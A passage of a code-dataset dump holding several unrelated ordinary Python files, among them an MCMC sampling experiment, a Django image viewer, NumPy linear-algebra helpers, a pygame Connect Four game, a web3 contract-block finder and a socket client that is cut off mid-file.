0.0\n for chain_ix in range(n_chains):\n start_time = time.time()\n s, a = THUG(u0s[chain_ix, :], B*δ, B, N, α, logηϵ, J, method='linear', rng=rngs[chain_ix], safe=safe)\n runtime = time.time() - start_time\n verboseprint(\"epsilon={} B={} time={} a={} uot={}\".format(ϵ, B, runtime, a.mean(), unique(s, axis=0).shape[0]))\n chains.append(s)\n times.append(runtime)\n avg_ap += (a.mean() / n_chains)\n verboseprint()\n ESS_TABLE[ϵ_ix, B_ix] = compute_arviz_miness_runtime(chains, times)\n AP_TABLE[ϵ_ix, B_ix] = avg_ap\n return ESS_TABLE, AP_TABLE\n\n\ndef cc_experiment_crwm(settings, tol=1e-11, rev_tol=1e-8, verbose=False):\n \"\"\"Same as above but for C-RWM.\"\"\"\n verboseprint = print if verbose else lambda *a, **k: None\n Bs = settings['Bs']\n u0s = settings['u0s']\n manifold = settings['manifold']\n N = settings['N']\n δ = settings['δ']\n n_chains = settings['n_chains']\n rngs = settings['rngs']\n ESS_TABLE = zeros(len(Bs))\n AP_TABLE = zeros(len(Bs))\n for B_ix, B in enumerate(Bs):\n chains = []\n times = []\n avg_ap = 0.0\n for chain_ix in range(n_chains):\n start_time = time.time()\n s, e, a = CRWM(u0s[chain_ix, :], manifold, N, δ*B, B, tol=tol, rev_tol=rev_tol, rng=rngs[chain_ix])\n runtime = time.time() - start_time\n verboseprint(\"B={} time={} a={}\".format(B, runtime, a.mean()))\n chains.append(s)\n times.append(runtime)\n avg_ap += (a.mean() / n_chains)\n ESS_TABLE[B_ix] = compute_arviz_miness_runtime(chains, times)\n AP_TABLE[B_ix] = avg_ap\n return ESS_TABLE, AP_TABLE\n\n\ndef show_only_positive_ap(cc, ap, ix):\n \"\"\"USED FOR PLOTTING ONLY ESS WHERE WE HAD POSITIVE ACCEPTANCE PROBABILITY.\"\"\"\n cc_copy = cc.copy()\n ap_copy = ap.copy()\n flag = ap_copy[:, ix] < 1e-8\n values = cc_copy[:, ix]\n values[flag] = nan\n return values\n\n\ndef show_only_positive_ap_crwm(out_cc, out_ap, ϵs, ix):\n \"\"\"Same as above but for C-RWM.\"\"\"\n cc_copy = deepcopy(out_cc.copy())\n ap_copy = deepcopy(out_ap.copy())\n flag = ap_copy < 1e-8\n cc_copy[flag] = nan\n return repeat(cc_copy[ix], len(ϵs))\n\n\nif __name__== \"__main__\":\n # Global settings\n N_CHAINS = 4\n SEED_DATA_GENERATION = 1111 # Used to generate y*\n SEEDS_FOR_CHAINS = [1122, 2233, 3344, 4455] #[6666, 7777, 8888, 9999] #[2222, 3333, 4444, 5555] # Each seed, used to find starting point of initial chain.\n Z_TRUE = (0.4, 0.005, 0.05, 0.001)\n R0 = 100\n F0 = 100\n σR = 1\n σF = 1\n EPSILONS = generate_powers_of_ten(0, -6) # [1.0, 0.1, 0.01, 0.001, 0.0001, 0.00001, 0.000001]\n BS = [1, 10, 20]\n STEP_SIZE = 0.01\n DISCRETIZATION_STEP_SIZE = 1.0\n SAFE_JACOBIAN = False\n assert len(SEEDS_FOR_CHAINS) == N_CHAINS, \"For reproducibility, you need to choose `N_CHAINS` random seeds.\"\n\n # Settings for Ns=100\n SETTINGS100 = generate_settings(\n N=200, \n δ=STEP_SIZE, \n Ns=100, \n Bs=BS, \n ϵs=EPSILONS, \n u1_true=False,\n tol=1e-14,\n n_chains=N_CHAINS,\n seeds=SEEDS_FOR_CHAINS\n )\n\n# # Settings for Ns=120\n# SETTINGS120 = generate_settings(\n# N=200, \n# δ=STEP_SIZE, \n# Ns=120, \n# Bs=BS, \n# ϵs=EPSILONS, \n# u1_true=False,\n# tol=1e-14,\n# n_chains=N_CHAINS,\n# seeds=SEEDS_FOR_CHAINS\n# )\n\n # Ns = 100\n # THUG00_CC_100, THUG00_AP_100 = cc_experiment_thug(SETTINGS100, 0.0, verbose=False, safe=SAFE_JACOBIAN)\n # THUG09_CC_100, THUG09_AP_100 = cc_experiment_thug(SETTINGS100, 0.9, verbose=False, safe=SAFE_JACOBIAN)\n # THUG99_CC_100, THUG99_AP_100 = cc_experiment_thug(SETTINGS100, 0.99, verbose=False, safe=SAFE_JACOBIAN)\n # CRWM_CC_100, CRWM_AP_100 = cc_experiment_crwm(SETTINGS100, tol=1e-11, verbose=False)\n # Ns = 120\n # THUG00_CC_120, THUG00_AP_120 = cc_experiment_thug(SETTINGS120, 0.0, verbose=False, safe=SAFE_JACOBIAN)\n # THUG09_CC_120, THUG09_AP_120 = cc_experiment_thug(SETTINGS120, 0.9, verbose=False, safe=SAFE_JACOBIAN)\n # THUG99_CC_120, THUG99_AP_120 = cc_experiment_thug(SETTINGS120, 0.99, verbose=False, safe=SAFE_JACOBIAN)\n # CRWM_CC_120, CRWM_AP_120 = cc_experiment_crwm(SETTINGS120, tol=1e-11, verbose=False)\n\n\n\n # Construct folder to save data\n mainfolder = \"LV_Experiment\"\n subfolder = \"_\".join([str(seed) for seed in SEEDS_FOR_CHAINS])\n folder = os.path.join(mainfolder, subfolder)\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n # Save data for Ns=100\n # save(os.path.join(folder, 'THUG00_CC_100.npy'), THUG00_CC_100)\n # save(os.path.join(folder, 'THUG00_AP_100.npy'), THUG00_AP_100)\n # save(os.path.join(folder, 'THUG09_CC_100.npy'), THUG09_CC_100)\n # save(os.path.join(folder, 'THUG09_AP_100.npy'), THUG09_AP_100)\n # save(os.path.join(folder, 'THUG99_CC_100.npy'), THUG99_CC_100)\n # save(os.path.join(folder, 'THUG99_AP_100.npy'), THUG99_AP_100)\n # save(os.path.join(folder, 'CRWM_CC_100.npy'), CRWM_CC_100)\n # save(os.path.join(folder, 'CRWM_AP_100.npy'), CRWM_AP_100)\n\n # Save data for Ns=120\n # save(os.path.join(folder, 'THUG00_CC_120.npy'), THUG00_CC_120)\n # save(os.path.join(folder, 'THUG00_AP_120.npy'), THUG00_AP_120)\n # save(os.path.join(folder, 'THUG09_CC_120.npy'), THUG09_CC_120)\n # save(os.path.join(folder, 'THUG09_AP_120.npy'), THUG09_AP_120)\n # save(os.path.join(folder, 'THUG99_CC_120.npy'), THUG99_CC_120)\n # save(os.path.join(folder, 'THUG99_AP_120.npy'), THUG99_AP_120)\n # save(os.path.join(folder, 'CRWM_CC_120.npy'), CRWM_CC_120)\n # save(os.path.join(folder, 'CRWM_AP_120.npy'), CRWM_AP_120)\n\n # Save Epsilons\n # save(os.path.join(folder, 'EPSILONS.npy'), EPSILONS)\n # save(os.path.join(folder, 'BS.npy'), BS)\n","repo_name":"MauroCE/ApproximateManifoldSamplingPaper","sub_path":"LV_Experiment.py","file_name":"LV_Experiment.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"40551116846","text":"# commandline to use:\n# pip install setuptools\n# python setup.py build\n# python setup.py install\n#\n\nfrom distutils.core import setup, Extension\n\nsource_files = ['scampmodule.cpp', 'scampmodule_packet_switch.cpp']\n\next_module_1 = Extension(\n name = 'scamp', \n sources = source_files, \n include_dirs = ['../scamp5d_interface'], \n library_dirs = ['../x64/Release/'], # for a 32-bit build, it's '../Release/'\n libraries = ['scamp5d_interface','kernel32','user32','advapi32'],\n extra_compile_args = ['/O2'],\n extra_link_args = ['/LTCG:OFF'],\n language='c++'\n )\n \nsetup(name = 'scamp', version = '1.0', author='Jianing Chen', ext_modules = [ext_module_1])\n","repo_name":"yananliusdu/scamp5d_interface","sub_path":"scamp_python_module/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"36865561222","text":"from collections.abc import Mapping\nfrom typing import Any, Optional\n\nfrom .data_model import DataModel\nfrom .immutable import ImmutableDict, json_encoder\n\n\nclass PantherEvent(ImmutableDict): # pylint: disable=R0901\n \"\"\"Panther enriched event with unified data model (udm) access.\"\"\"\n\n def __init__(self, event: Mapping, data_model: Optional[DataModel]):\n \"\"\"Create data model lookups\n\n Args:\n event: Dictionary representing the event.\n data_model: the data model used for the LogType associated with this event\n \"\"\"\n super().__init__(event)\n self.data_model = data_model\n\n def udm(self, key: str) -> Any:\n \"\"\"Converts standard data model field to logtype field\"\"\"\n if not self.data_model:\n raise Exception(\"a data model hasn't been specified\")\n # access values via standardized fields\n if key in self.data_model.paths:\n # we are dealing with a jsonpath\n json_path = self.data_model.paths.get(key)\n if json_path:\n matches = json_path.find(self._container)\n if len(matches) == 1:\n return self._ensure_immutable(matches[0].value)\n if len(matches) > 1:\n raise Exception(\n 'JSONPath [{}] in DataModel [{}], matched multiple fields.'.format(json_path, self.data_model.data_model_id)\n )\n if key in self.data_model.methods:\n # we are dealing with method\n method = self.data_model.methods.get(key)\n if callable(method):\n return self._ensure_immutable(method(self._ensure_immutable(self._container)))\n # no matches, return None by default\n return None\n\n json_encoder = json_encoder\n","repo_name":"smaniar/panther","sub_path":"internal/log_analysis/rules_engine/src/enriched_event.py","file_name":"enriched_event.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"26020043506","text":"from fileinput import FileInput\r\n\r\n\r\n# str.format\r\nname = \"Filip\"\r\nage = 37\r\nprofession = \"musician\"\r\n\r\nprint(\"Hello, I'm {}, and I'm {}. I work as a {}.\" .format(name, age, profession))\r\n\r\n# f-strings\r\nmyName = \"Marek\"\r\nmyAge = \"65\"\r\nmyProfession = \"babysitter\"\r\n\r\nprint(f\"hello, {myName}. You are {myAge} and you work as a {myProfession} \")\r\n","repo_name":"prokofiew/Python","sub_path":"chapter_I/24.a.placement.format.py","file_name":"24.a.placement.format.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20070357988","text":"from django.shortcuts import render\nimport os\nfrom .models import ImageSeries\nimport base64\n\n\ndef image_series_list(request):\n return render(request, 'image_series_list.html', {\n 'all_image_series': ImageSeries.objects.all(),\n })\n\ndef image_viewer(request):\n id = str(request).split(\"/\")[-1]\n id = id.split(\"'\")[0]\n\n images = os.listdir(\"media/image_dumps/\" + id)\n images.sort()\n base64_data = []\n for image in images:\n with open(\"media/image_dumps/\" + id + \"/\" + image, \"rb\") as image_file:\n data_uri = base64.b64encode(image_file.read()).decode(\"ascii\")\n base64_data.append('data:image/png;base64,{0}'.format(data_uri))\n\n return render(request, 'image_viewer.html', {\n #folder name for specific series\n \"images\":base64_data,\n \"count\": len(base64_data),\n \"start\": int(len(base64_data) / 2),\n })\n","repo_name":"doby162/dicom-viewer","sub_path":"slicer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22186699349","text":"# linear_algebra.py\n\n##############################################################################\n# Imports #\n##############################################################################\nimport numpy as np\nfrom numpy import ndarray\nfrom typing import Union, Tuple\n\n\ndef solve_linear(A: np.ndarray, b: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Solves a system of linear equations.\n\n Parameters:\n A (numpy.ndarray): Coefficient matrix.\n b (numpy.ndarray): Constant vector.\n\n Returns:\n numpy.ndarray: Solution vector.\n \"\"\"\n try:\n return np.linalg.solve(A, b)\n except np.linalg.LinAlgError:\n print(\"Error: Matrix A is singular.\")\n return None\n except ValueError:\n print(\"Error: Invalid input for linear equation.\")\n return None\n\n\ndef solve_quadratic(a: float, b: float, c: float) -> Union[str, Tuple[float, float], float]:\n \"\"\"\n Solves a quadratic equation ax^2 + bx + c = 0.\n\n Parameters:\n a, b, c (float): Coefficients of the quadratic equation.\n\n Returns:\n Union[str, Tuple[float, float]]: Real solutions of the quadratic equation.\n \"\"\"\n disc = b ** 2 - 4 * a * c\n if disc < 0:\n return \"No real solutions\"\n elif disc == 0:\n return -b / (2 * a)\n else:\n root1 = (-b + np.sqrt(disc)) / (2 * a)\n root2 = (-b - np.sqrt(disc)) / (2 * a)\n return root1, root2\n\n\ndef add_matrices(m1: np.ndarray, m2: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Adds two matrices.\n\n Parameters:\n m1, m2 (numpy.ndarray): Matrices to be added.\n\n Returns:\n numpy.ndarray: Result of the addition.\n \"\"\"\n try:\n return np.add(m1, m2)\n except ValueError:\n print(\"Error: Matrices must have the same dimensions.\")\n return None\n\n\ndef subtract_matrices(m1: np.ndarray, m2: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Subtracts two matrices.\n\n Parameters:\n m1, m2 (numpy.ndarray): Matrices to be subtracted.\n\n Returns:\n numpy.ndarray: Result of the subtraction.\n \"\"\"\n try:\n return np.subtract(m1, m2)\n except ValueError:\n print(\"Error: Matrices must have the same dimensions.\")\n return None\n\n\ndef scalar_multiply(scalar: float, matrix: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Multiplies a matrix by a scalar.\n\n Parameters:\n scalar (float): Scalar to multiply the matrix by.\n matrix (numpy.ndarray): Matrix to be multiplied.\n\n Returns:\n numpy.ndarray: Result of the multiplication.\n \"\"\"\n try:\n return np.multiply(scalar, matrix)\n except ValueError:\n print(\"Error: Invalid input for scalar multiplication.\")\n return None\n\n\ndef multiply_matrices(m1: np.ndarray, m2: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Multiplies two matrices.\n\n Parameters:\n m1, m2 (numpy.ndarray): Matrices to be multiplied.\n\n Returns:\n numpy.ndarray: Result of the multiplication.\n \"\"\"\n try:\n return np.matmul(m1, m2)\n except ValueError:\n print(\"Error: Matrices are not compatible for multiplication.\")\n return None\n\n\ndef determinant(matrix: np.ndarray) -> float | None:\n \"\"\"\n Calculates the determinant of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix whose determinant is to be calculated.\n\n Returns:\n float: Determinant of the matrix.\n \"\"\"\n try:\n return np.linalg.det(matrix)\n except np.linalg.LinAlgError:\n print(\"Error: Matrix must be square.\")\n return None\n except ValueError:\n print(\"Error: Invalid input for determinant calculation.\")\n return None\n\n\ndef is_symmetric(matrix: np.ndarray) -> bool | None:\n \"\"\"\n Checks if a matrix is symmetric.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to be checked.\n\n Returns:\n bool: True if the matrix is symmetric, False otherwise.\n \"\"\"\n try:\n return np.array_equal(matrix, matrix.T)\n except ValueError:\n print(\"Error: Invalid input for symmetry check.\")\n return None\n\n\ndef inverse(matrix: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Calculates the inverse of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to be inverted.\n\n Returns:\n numpy.ndarray: Inverse of the matrix.\n \"\"\"\n try:\n return np.linalg.inv(matrix)\n except np.linalg.LinAlgError:\n print(\"Error: Matrix must be square and invertible.\")\n return None\n except ValueError:\n print(\"Error: Invalid input for inverse calculation.\")\n return None\n\n\ndef eigen(matrix: np.ndarray) -> Union[Tuple[np.ndarray, np.ndarray], None]:\n \"\"\"\n Calculates the eigenvalues and eigenvectors of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to calculate eigenvalues and eigenvectors of.\n\n Returns:\n Union[Tuple[np.ndarray, np.ndarray], None]: A tuple containing a numpy.ndarray of eigenvalues and a 2D\n numpy.ndarray of the corresponding eigenvectors.\n \"\"\"\n try:\n eigenvalues, eigenvectors = np.linalg.eig(matrix)\n return eigenvalues, eigenvectors\n except np.linalg.LinAlgError:\n print(\"Error: Matrix must be square.\")\n return None\n except ValueError:\n print(\"Error: Invalid input for eigenvalue and eigenvector calculation.\")\n return None\n\n\ndef transpose(matrix: np.ndarray) -> np.ndarray | None:\n \"\"\"\n Calculates the transpose of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to be transposed.\n\n Returns:\n numpy.ndarray: Transpose of the matrix.\n \"\"\"\n try:\n return np.transpose(matrix)\n except ValueError:\n print(\"Error: Invalid input for transpose calculation.\")\n return None\n\n\ndef trace(matrix: np.ndarray) -> ndarray | None:\n \"\"\"\n Calculates the trace of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to calculate the trace of.\n\n Returns:\n float: Trace of the matrix.\n \"\"\"\n try:\n return np.trace(matrix)\n except ValueError:\n print(\"Error: Invalid input for trace calculation.\")\n return None\n\n\ndef rank(matrix: np.ndarray) -> int | None:\n \"\"\"\n Calculates the rank of a matrix.\n\n Parameters:\n matrix (numpy.ndarray): Matrix to calculate the rank of.\n\n Returns:\n int: Rank of the matrix.\n \"\"\"\n try:\n return np.linalg.matrix_rank(matrix)\n except ValueError:\n print(\"Error: Invalid input for rank calculation.\")\n return None\n","repo_name":"NitBuk/Wolfram-Beta","sub_path":"linear_algebra.py","file_name":"linear_algebra.py","file_ext":"py","file_size_in_byte":6474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"14714616483","text":"import pygame\n\nfrom Computer import SimpleComputer\nfrom Game import Game\nfrom Board import Board\n\nclass Gui:\n def __init__(self,game):\n self._game = game\n self._x = 40\n self._y = 120\n self._run = True\n \n def start(self):\n pygame.init()\n\n pygame.display.set_caption(\"Connect 4\")\n win = pygame.display.set_mode((560,560))\n font = pygame.font.SysFont(\"Monospace\",75) \n\n while self._run == True:\n pygame.time.delay(100)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self._run = False\n if event.type == pygame.MOUSEMOTION:\n pygame.draw.rect(win,(0,0,0),(0,0,560,80))\n circleX = event.pos[0]\n pygame.draw.circle(win,(255,255,0),(circleX,40),35,35)\n if event.type == pygame.MOUSEBUTTONDOWN:\n x = event.pos[0]\n x = x// 80 + 1\n self._game.playerMove(x,1)\n if self._game._board.isWin() == True:\n #print(\"You win!\")\n pygame.draw.rect(win,(0,0,0),(0,0,560,80))\n label = font.render(\"You Win!\",1,(255,255,0))\n win.blit(label,(40,10))\n self._run = False\n break\n self._game.computerMove(-1)\n if self._game._board.isWin() == True:\n #print(\"You lose!\")\n pygame.draw.rect(win,(0,0,0),(0,0,560,80))\n label = font.render(\"You lose!\",1,(255,255,0))\n win.blit(label,(40,10))\n self._run = False\n break\n if self._game._board.isTie() == True:\n #print(\"It's a draw!\")\n pygame.draw.rect(win,(0,0,0),(0,0,560,80))\n label = font.render(\"Draw!\",1,(255,255,0))\n win.blit(label,(40,10)) \n self._run = False\n break\n \n pygame.draw.rect(win,(0,0,255),(0,80,560,480))\n\n for position in range(0,42):\n posX = 40 + 80*(position % 7) \n posY = 120 + 80*(position // 7)\n\n if self._game._board._data[position] == 0:\n pygame.draw.circle(win,(0,0,0),(posX,posY),35,35)\n elif self._game._board._data[position] == 1:\n pygame.draw.circle(win,(255,255,0),(posX,posY),35,35)\n else:\n pygame.draw.circle(win,(255,0,0),(posX,posY),35,35) \n \n pygame.display.update() \n\n if self._run == False:\n pygame.time.wait(3000) \n \n pygame.quit() \n\nb = Board()\nc = SimpleComputer(b)\ng = Game(b,c)\ng = Gui(g)\ng.start()\n","repo_name":"DaridaRazvan/Connect-Four","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11927964638","text":"start = int(input())\r\nend = int(input())\r\nmagic_number = int(input())\r\ncounter = 0\r\nfound = False\r\n\r\nfor n1 in range(start, end+1):\r\n for n2 in range(start, end+1):\r\n counter += 1\r\n if not found and n1 + n2 == magic_number:\r\n found = True\r\n print(f\"Combination N:{counter} ({n1} + {n2} = {magic_number})\")\r\n\r\n\r\nif not found:\r\n print(f\"{counter} combinations - neither equals {magic_number}\")","repo_name":"bgivsto/SoftUni","sub_path":"Programming Basics with Python - септември 2022/11.Nested Loops - Lab/04.Sum of Two Numbers.py","file_name":"04.Sum of Two Numbers.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3923000840","text":"\"\"\"\n\tpolicy force policy\n\"\"\"\nfrom simulation.base import SimulationCategory, PolicyBase, Effect\n\n\nclass PoliceForcePolicy(PolicyBase):\n\t\"\"\"\n\t\tpolicy force policy\n\t\"\"\"\n\t\n\tdef __init__(self):\n\t\tsuper().__init__(\n\t\t\t\"Police Force\",\n\t\t\t\"Every government needs to employ a police force to ensure order is kept and laws are obeyed, \"\n\t\t\t\"but it's a matter of debate exactly how much should be spent on the police. Some favor a \"\n\t\t\t\"large force with police on every street corner, other prefer a more low-key and tolerant \"\n\t\t\t\"approach.\",\n\t\t\tcategory=SimulationCategory.law_and_order,\n\t\t\tslider=['NONE',\t'LOW', 'MEDIUM', 'HIGH', 'MAXIMUM'],\n\t\t\tcan_be_cancelled=False,\n\t\t\tintroduce=25, # in political capital\n\t\t\tcancel=37, # in political capital\n\t\t\traise_cost=4, # in political capital\n\t\t\tlower_cost=18, # in political capital\n\t\t\tmin_cost=300,\n\t\t\tmax_cost=2320,\n\t\t\timplementation=6,\n\t\t\tmin_income=0,\n\t\t\tmax_income=0\n\t\t)\n\t\t\n\t\tself.cost_multiplier = [] # _default_,1.0;Wages,-0.1+(0.2*x)\n\t\t\n\t\t# https://github.com/Thalassicus/Democracy-3/blob/d7d51b848675cae9d6a7a193e040b2f01a83d463/data/missions/germany/germany.txt\n\t\tself.slider_value = 'HIGH'\n\t\tself.value = 0.8\n\n\t\t# connections:\n\t\tself.effects.append(Effect('crime_rate', '-0.35 * (x ** 0.6)', 4))\n\t\tself.effects.append(Effect('violent_crime_rate', '-0.52 * (x ** 0.6)', 3))\n\t\t# DrugCrimeRate,0-(0.1*x),3\n\t\tself.effects.append(Effect('conservatives_mood', '-0.2 + (0.48 * x)'))\n\t\tself.effects.append(Effect('state_employees_mood', '-0.15 + (0.37 * x)'))\n\t\tself.effects.append(Effect('state_employees_freq', '-0.05 + (0.1 * x)'))\n\t\t# state_employees_income,-0.3+(0.09*x)\n\t\tself.effects.append(Effect('unemployment', '0 - (0.03 * x)'))\n\t\tself.effects.append(Effect('alcoholism', '0 - (0.6 * x) '))\n\t\tself.effects.append(Effect('street_gangs', '0-(0.17*x)', 4))\n","repo_name":"mrommel/SmartPopulation","sub_path":"simulation/policies/policy_force.py","file_name":"policy_force.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10882065740","text":"#!/usr/bin/env python\n\nimport argparse\nimport re\nimport pprint\nimport math\nfrom web3 import Web3, HTTPProvider\n\ndef main():\n\n DEBUG = False \n parser = argparse.ArgumentParser()\n parser.add_argument(\"contract_address\", help=\"the address of the contract you want to examine\")\n parser.add_argument(\"web3_host\", help=\"host domain you want to examine (ex: https://ropsten.infura.io/v3/f54e8e6ea8e73724b81518b6d5c31a07)\")\n args = parser.parse_args()\n\n contract_address = args.contract_address\n web3_host = args.web3_host\n\n #verify args\n acceptable_address = re.compile('^0x\\w{40}$')\n if not acceptable_address.match(contract_address):\n print(\" contract_address is not in the correct format -- it should start with '0x' followed by 40 alphanumeric characters.\")\n \n acceptable_host = re.compile('^http')\n if not acceptable_host.match(web3_host):\n print(\" web3_host is not in the correct format -- it should start with 'http' and provide a URL and API key\")\n\n # web3.py instance\n w3 = Web3(HTTPProvider(web3_host))\n\n try:\n shortest = w3.eth.getBlock('earliest')['number']\n except:\n print(\"\\nOops. It looks like you aren't authorized to use the Web3 host URL you provided. Please double-check your URL.\\n\")\n\n tallest = w3.eth.getBlock('latest')['number']\n\n block_nbr = find_block_nbr( shortest, tallest, contract_address, w3 )\n if DEBUG: print(\"The contract was deployed in Block number: \", block_nbr) \n\n if DEBUG: print(\"Contract Address: \", contract_address)\n block = w3.eth.getBlock( block_nbr )\n transactions = block['transactions']\n\n if DEBUG: print(\"Looping through transactions\")\n for elem in transactions:\n transaction = w3.eth.getTransactionReceipt(elem)\n\n if transaction['contractAddress'] == contract_address:\n print('Block Hash: ', end='', flush=True)\n pprint.pprint(transaction['blockHash'])\n print('Transaction Hash: ', end='', flush=True)\n pprint.pprint(transaction['transactionHash'])\n\n\ndef round_up(val):\n\n \"\"\"\n .. function:: round_up(val)\n Rounds *val* to the nearest integer. .5 is always rounded up.\n\n round_up() always rounds .5 up to the nearest integer. This was the default behavior of the round() function before Python 3.\n In Python 3: \"Exact halfway cases are now rounded to the nearest even result instead of away from zero. (For example, round(2.5) \n now returns 2 rather than 3.)\" (source: https://docs.python.org/3/whatsnew/3.0.html)\n\n Python 3's round() behavior would have given us inconsistent results in find_block_nbr()\n \"\"\"\n\n if (float(val) % 1) >= 0.5:\n x = math.ceil(val)\n else:\n x = round(val)\n\n return x\n\ndef find_block_nbr( shortest, tallest, contract_address, w3):\n\n \"\"\"\n .. function:: find_block_nbr(shortest, tallest, contract_address, w3)\n Returns the block number in which a smart contract was deployed\n\n find_block_nbr() finds the block at which the smart contract identified by the contract_address was deployed\n We find this by calling web3.eth.getCode(), which has an optional block_identifier param which specifies the block height\n If getCode() returns: Hexcode(0x) then we know that the block height is too short -- the contract was deployed in a later block\n We then choose a new block height halfway between the tallest and shortest block heights that we have tested to see whether \n the contract had been deployed before this new block\n\n We're looking for the shortest and tallest block heights where the block heights are only separated by a single block, and\n at which eth.getCode() returns None for the shorter block height and bytecode for the taller block height. When we find \n that point, the taller block height will be the block number at which the contract was deployed.\n \"\"\"\n\n if tallest - shortest == 1:\n return tallest\n\n else:\n halfway = int(round_up(((tallest-shortest)/2)));\n block_height = shortest + halfway\n bytecode = w3.eth.getCode(contract_address,block_height)\n\n #block_height is too short -- update shortest\n if bytecode == b'':\n shortest = block_height\n\n #block_height is too tall -- update tallest\n else: \n tallest = block_height \n\n return find_block_nbr(shortest, tallest, contract_address, w3)\n\nif __name__ == '__main__':\n main()\n","repo_name":"cbrooks42/which-block","sub_path":"which_block.py","file_name":"which_block.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37866346125","text":"# The turtle begins in the center of the screen.\n# Flip a coin. If its heads then turn to the left 90 degrees.\n# If its tails then turn to the right 90 degrees.\n# Take 50 steps forward.\n# If the turtle has moved outside the screen then stop,\n# otherwise go back to step 2 and repeat.\n\nimport turtle\nimport random\n\ndef in_bounds(t):\n\n turtlex = t.xcor() #coordinates for turtle\n turtley = t.ycor()\n\n still_in = True # determine true/false for\n if int(turtlex) not in range(-300, 300): # bounds of turtle\n still_in = False\n if int(turtley) not in range(-300, 300):\n still_in = False\n return still_in\n\ndef flip_a_coin(t):\n coin = random.randint(0,2) # turtle doing random turns\n if coin == 0:\n t.lt(90)\n else:\n t.rt(90)\n t.fd(50) # turtle moving forward\n\ndef main():\n wn = turtle.Screen()\n wn.bgcolor('black')\n blu = turtle.Turtle()\n blu.showturtle()\n # blu.setpos(0, 0)\n blu.color('green')\n blu.pensize(2)\n blu.pendown()\n wn.setup(600, 600, startx=None, starty=None)\n while in_bounds(blu):\n flip_a_coin(blu)\n wn.exitonclick()\nmain()\n","repo_name":"nreis11/practice","sub_path":"turtle_practice.py","file_name":"turtle_practice.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33548966142","text":"# pylint: disable=protected-access\nimport json\n\nimport pytest\n\n\n@pytest.mark.parametrize(\n 'request_body, expected_status, expected_response',\n [\n ({}, 400, {'schemas': []}),\n (\n {\n 'source_type': 'postgres',\n 'schema_database': 'does-not-exist',\n 'source_ident': 'table_name',\n },\n 400,\n None,\n ),\n (\n {\n 'source_type': 'postgres',\n 'source_ident': 'table_name',\n 'secret': {\n 'secret_id': 'STRONGBOX_ID',\n 'secret_type': 'strongbox',\n },\n },\n 404,\n None,\n ),\n ],\n)\nasync def test_schemas_retrieve(\n replication_client, request_body, expected_status, expected_response,\n):\n response = await replication_client.post(\n f'/schemas/v1/source/retrieve', data=json.dumps(request_body),\n )\n assert response.status == expected_status, await response.text()\n if expected_status == 200:\n assert await response.json() == expected_response\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_replication/api/test_schemas_source_retrieve.py","file_name":"test_schemas_source_retrieve.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35613756271","text":"from datetime import datetime\nimport socket\nfrom threading import Thread\nimport json\nfrom time import sleep\nHOST = 'lockscale.kro.kr'\nPORT = 5000\nID = 1234\n\ndef socket_connect():\n global client_socket\n print(\"connecting\")\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n client_socket.settimeout(10)\n sleep(5)\n client_socket.connect((HOST, PORT))\n except:\n return\n socket_send(\"new\")\n sleep(0.5)\n\n\ndef socket_send(data):\n send = {\n 'identify': 'region',\n 'id': ID,\n 'data': data\n }\n try:\n client_socket.send(json.dumps(send).encode())\n print(\"Send Success\")\n except:\n print(\"Send Failed\")\n\n\ndef receiver():\n while True:\n try:\n recv = client_socket.recv(1024)\n if len(recv) == 0:\n print(\"disconnected\")\n socket_connect()\n\n data = json.loads(recv.decode())\n status = data.get('status')\n info = data.get('data')\n if status == \"ok\":\n print(\"연결됨\")\n if not info:\n break\n info.get(\"id\")\n except:\n pass\n\n\ndef concurrent():\n while True:\n sleep(60)\n message = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n socket_send(message)\n\n\n# 키보드로 입력한 문자열을 서버로 전송하고\n# 서버에서 에코되어 돌아오는 메시지를 받으면 화면에 출력합니다.\n# quit를 입력할 때 까지 반복합니다.\nif __name__ == 